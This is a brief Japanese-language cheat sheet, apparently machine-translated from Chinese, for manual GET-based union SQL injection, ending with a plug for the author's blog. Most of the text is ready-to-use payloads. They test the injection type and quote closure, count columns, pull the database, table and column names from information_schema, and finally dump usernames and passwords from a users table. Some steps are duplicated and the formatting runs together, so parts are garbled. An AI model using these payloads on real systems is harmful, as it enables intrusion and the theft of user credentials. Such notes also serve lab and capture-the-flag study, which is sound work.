SQL注入の基本ステップ
GETタイプ
1.文字型か数字型かを判断する
2-1
2.エラー判定でクローズを判断する
''''LIMIT 0,1
3.クエリーのフィールド数を確認する
1.文字型か数字型かを判断する
2-1
2.エラー判定でクローズを判断する
''''LIMIT 0,1
3.クエリーのフィールド数を確認する
order by 34.ビット情報の確認union select 1,2,3 --+5.爆庫名union select 1,2,database() --+6.爆発表名union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sql'--+7.バーストフィールドunion select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sql' and table_name='users'--+8.ログイン名とパスワードunion select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users --+私のブログ行雲ブログに注目してください。